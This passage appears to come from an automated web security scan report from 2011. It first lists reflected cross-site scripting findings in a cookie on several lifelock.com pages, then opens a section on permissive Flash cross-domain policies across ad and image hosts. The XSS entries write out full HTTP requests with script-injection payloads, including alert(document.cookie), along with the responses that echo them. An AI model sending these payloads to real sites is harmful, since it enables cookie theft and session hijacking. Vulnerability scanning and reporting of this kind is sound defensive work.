Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; BIGipServerpool_www.lifelock.com=319031818.20480.0000; TSceba2f=d03f174909aa821fd06beafbefcefa10f2f0945343012f3c4db449cd; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; LifeLockEnrollment=621fd"><script>alert(1)</script>1b53291154; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:52:01 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=0683e5d413347c4b5b90e37235621395f2f0945343012f3c4db45531; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 13478

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?621fd"><script>alert(1)</script>1b53291154" class="enroll-now">
...[SNIP]...

6.469. http://www.lifelock.com/offers/faces/female/ [LifeLockEnrollment cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /offers/faces/female/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the HTML document as plain text between tags. The payload a0a50<script>alert(1)</script>3020af7b232 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /offers/faces/female/ HTTP/1.1
Host: www.lifelock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: C3UID=13014572191303613803; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; TSceba2f=7180cd0237e9eb5fad8baed205388e9c46467b97f00c03b84db45440; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/47/48; 480-PV=3114#4/24/2011/2/56/45; BIGipServerpool_www.lifelock.com=319031818.20480.0000; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; __utma=182152376.1080477552.1303613800.1303660958.1303663668.4; __utmc=182152376; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; __utmb=182152376.1.10.1303663668; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29a0a50<script>alert(1)</script>3020af7b232;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:52:00 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=6baa48c1078070e72a0280fbebbb015e1e317b6d7ec599f04db45530; Path=/
Vary: Accept-Encoding
Connection: close

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
</script>7f71559fd29a0a50<script>alert(1)</script>3020af7b232" class="enroll-now">
...[SNIP]...

6.470. http://www.lifelock.com/offers/faces/female/ [LifeLockEnrollment cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /offers/faces/female/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55bf4"><script>alert(1)</script>affc3b8c147 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /offers/faces/female/ HTTP/1.1
Host: www.lifelock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: C3UID=13014572191303613803; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; TSceba2f=7180cd0237e9eb5fad8baed205388e9c46467b97f00c03b84db45440; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/47/48; 480-PV=3114#4/24/2011/2/56/45; BIGipServerpool_www.lifelock.com=319031818.20480.0000; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; __utma=182152376.1080477552.1303613800.1303660958.1303663668.4; __utmc=182152376; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; __utmb=182152376.1.10.1303663668; LifeLockEnrollment=55bf4"><script>alert(1)</script>affc3b8c147;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:51:59 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=d38feabd0f5fd7936fa112788836f2ac09247f49bfc4a0814db4552f; Path=/
Vary: Accept-Encoding
Connection: close

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?55bf4"><script>alert(1)</script>affc3b8c147" class="enroll-now">
...[SNIP]...

6.471. http://www.lifelock.com/services/ [LifeLockEnrollment cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /services/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25b98"><script>alert(1)</script>e69a6bab7e7 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /services/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; LifeLockEnrollment=25b98"><script>alert(1)</script>e69a6bab7e7; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; TSceba2f=68442ea13cc668c3f9534c1f2a818f2bf2f0945343012f3c4db4542d

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:52:29 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=303efb1bc7763d0b1b2c21e97575738d6eef8372758f26804db4554d; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 13479

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?25b98"><script>alert(1)</script>e69a6bab7e7" class="enroll-now">
...[SNIP]...

6.472. http://www.lifelock.com/services/ [LifeLockEnrollment cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /services/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the HTML document as plain text between tags. The payload 21da5<script>alert(1)</script>338342bbc87 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /services/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd2921da5<script>alert(1)</script>338342bbc87; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; TSceba2f=68442ea13cc668c3f9534c1f2a818f2bf2f0945343012f3c4db4542d

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:52:31 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=e4bcbd66780ffa4cb9625786fc1832a3e577b7a187e9b9174db4554f; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 13558

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
</script>7f71559fd2921da5<script>alert(1)</script>338342bbc87" class="enroll-now">
...[SNIP]...

6.473. http://www.lifelock.com/services/command-center/ [LifeLockEnrollment cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /services/command-center/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5ba6"><script>alert(1)</script>e4e00e2a89f was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /services/command-center/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; BIGipServerpool_www.lifelock.com=319031818.20480.0000; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; TSceba2f=672a43aa9e4e9b5fe762c7f07c003e9cd78ab7a6ed034dd24db4542d; __utma=182152376.1080477552.1303613800.1303660958.1303663668.4; __utmc=182152376; __utmb=182152376.1.10.1303663668; LifeLockEnrollment=c5ba6"><script>alert(1)</script>e4e00e2a89f; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/47/48

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:54:23 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=11114c77d20e7b06e294ffb71c67a5fff5f74769aa5b32df4db455bf; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 13275

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?c5ba6"><script>alert(1)</script>e4e00e2a89f" class="enroll-now">
...[SNIP]...

6.474. http://www.lifelock.com/services/command-center/ [LifeLockEnrollment cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /services/command-center/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the HTML document as plain text between tags. The payload b725e<script>alert(1)</script>9c72d3d911d was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /services/command-center/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; BIGipServerpool_www.lifelock.com=319031818.20480.0000; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; TSceba2f=672a43aa9e4e9b5fe762c7f07c003e9cd78ab7a6ed034dd24db4542d; __utma=182152376.1080477552.1303613800.1303660958.1303663668.4; __utmc=182152376; __utmb=182152376.1.10.1303663668; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29b725e<script>alert(1)</script>9c72d3d911d; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/47/48

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:54:26 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=863eae46603d2a78be5b51ce6d577f698d430ec0a7c986ab4db455c2; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 13433

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
</script>7f71559fd29b725e<script>alert(1)</script>9c72d3d911d" class="enroll-now">
...[SNIP]...

7. Flash cross-domain policy  previous  next
There are 108 instances of this issue:


7.1. http://0.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 0.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Sun, 24 Apr 2011 17:07:03 GMT
Expires: Sun, 24 Apr 2011 17:12:03 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.2. http://2byto.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://2byto.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 2byto.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:40:40 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
Last-Modified: Mon, 08 Mar 2010 00:38:12 GMT
ETag: "10000000fc553-145-4813f47ac1b42"
Accept-Ranges: bytes
Content-Length: 325
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.3. http://4.bp.blogspot.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://4.bp.blogspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 4.bp.blogspot.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Sun, 24 Apr 2011 03:14:44 GMT
Expires: Mon, 25 Apr 2011 03:14:44 GMT
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 03:14:44 GMT
Server: fife
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400, no-transform
Age: 34168

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

7.4. http://a.tribalfusion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.5. http://action.mathtag.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://action.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: action.mathtag.com

Response

HTTP/1.1 200 OK
Set-Cookie: uuid=1f4f0e2c-24cb-44dc-b70e-72c661ef1fc5; path=/; expires=Thu, 24-Apr-2014 00:50:22 GMT; domain=.mathtag.com
Content-Type: text/xml
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 215
Date: Mon, 25 Apr 2011 00:50:22 GMT
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

7.6. http://ad-emea.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 22 Oct 2008 18:22:36 GMT
Date: Sun, 24 Apr 2011 15:20:08 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.7. http://ad.amgdgt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.amgdgt.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "85814f-12e-4871688bd9a00"
Cache-Control: max-age=21600
Expires: Sun, 24 Apr 2011 12:37:00 GMT
Content-Type: text/xml
Content-Length: 302
Date: Sun, 24 Apr 2011 12:29:26 GMT
X-Varnish: 2161408220 2161275960
Age: 21142
Via: 1.1 varnish
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

7.8. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Sun, 24 Apr 2011 04:08:22 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.9. http://adfarm1.adition.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adfarm1.adition.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adfarm1.adition.com

Response

HTTP/1.1 200 OK
Server: ADITIONSERVER 1.0
Date: Sun, 24 Apr 2011 20:49:50 +0200
Connection: close
Content-Type: application/xml
Content-Length: 313

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" />
...[SNIP]...

7.10. http://ads.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:13ad"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Sun, 24 Apr 2011 16:46:37 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.11. http://adsfac.us/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

